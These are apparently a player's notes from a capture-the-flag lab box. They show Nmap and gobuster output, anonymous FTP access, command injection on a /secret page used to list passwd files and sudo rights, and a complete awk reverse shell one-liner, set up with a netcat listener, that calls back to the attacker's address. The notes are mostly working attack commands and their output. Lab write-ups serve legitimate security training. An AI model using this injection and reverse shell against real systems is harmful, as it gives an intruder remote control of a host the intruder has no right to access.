Nmap scan report for ip-10-10-212-225.eu-west-1.compute.internal (10.10.212.225)
Host is up (0.00046s latency).
Not shown: 8997 closed ports
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rw-r--r--    1 1001     1001           90 Oct 03  2020 note.txt
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to ::ffff:10.10.93.33
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 3
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 09:f9:5d:b9:18:d0:b2:3a:82:2d:6e:76:8c:c2:01:44 (RSA)
|   256 1b:cf:3a:49:8b:1b:20:b0:2c:6a:a5:51:a8:8f:1e:62 (ECDSA)
|_  256 30:05:cc:52:c6:6f:65:04:86:0f:72:41:c8:a4:39:cf (EdDSA)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-favicon: Unknown favicon MD5: 7EEEA719D1DF55D478C68D9886707F17
| http-methods: 
|_  Supported Methods: OPTIONS HEAD GET POST
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Game Info
MAC Address: 02:99:E3:36:7A:2D (Unknown)

========================================================================================================

ftp 10.10.212.225
Connected to 10.10.212.225.
220 (vsFTPd 3.0.3)
Name (10.10.212.225:root): anonymous
331 Please specify the password.
Password:
230 Login successful.


150 Here comes the directory listing.
-rw-r--r--    1 1001     1001           90 Oct 03  2020 note.txt
226 Directory send OK.
ftp> get note.txt


 cat note.txt
Anurodh told me that there is some filtering on strings being put in the command -- Apaar


navigate to port 80

gobuster dir -u http://10.10.212.225 -w /usr/share/wordlists/dirb/big.txt -x html,php
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.212.225
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirb/big.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Extensions:     html,php
[+] Timeout:        10s
===============================================================
2024/03/17 02:57:49 Starting gobuster
===============================================================
/.htpasswd (Status: 403)
/.htpasswd.html (Status: 403)
/.htpasswd.php (Status: 403)
/.htaccess (Status: 403)
/.htaccess.html (Status: 403)
/.htaccess.php (Status: 403)
/about.html (Status: 200)
/blog.html (Status: 200)
/contact.html (Status: 200)
/contact.php (Status: 200)
/css (Status: 301)
/fonts (Status: 301)
/images (Status: 301)
/index.html (Status: 200)
/js (Status: 301)
/news.html (Status: 200)
/secret (Status: 301)
/server-status (Status: 403)
/team.html (Status: 200)

/secret has a command injection spot



command=find / -type f -iname "*passwd"

/etc/cron.daily/passwd
/etc/pam.d/chpasswd
/etc/pam.d/passwd
/etc/passwd
/etc/security/opasswd
/usr/bin/gpasswd
/usr/bin/passwd
/usr/bin/htpasswd
/usr/share/lintian/overrides/base-passwd
/usr/share/lintian/overrides/passwd
/usr/share/bash-completion/completions/gpasswd
/usr/share/bash-completion/completions/chpasswd
/usr/share/bash-completion/completions/passwd
/usr/share/bash-completion/completions/htpasswd
/usr/sbin/chpasswd
/usr/sbin/update-passwd
/usr/sbin/chgpasswd
ls /home/apaar

Matching Defaults entries for www-data on ubuntu: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin User www-data may run the following commands on ubuntu: (apaar : ALL) NOPASSWD: /home/apaar/.helpline.sh



which passwd:
/usr/bin/passwd

locate .ssh:
/home/apaar/.ssh /home/apaar/.ssh/authorized_keys

lsb_release -a:
Distributor ID: Ubuntu Description: Ubuntu 18.04.5 LTS Release: 18.04 Codename: bionic 



we start a nc listener on 1235
and input the following reverse shell command into the input:
awk 'BEGIN {s = "/inet/tcp/0/10.10.93.33/1235"; while(42) { do{ printf "shell>" |& s; s |& getline c; if(c){ while ((c |& getline) > 0) print $0 |& s; close(c); } } while(c != "exit") close(s); }}' /dev/null
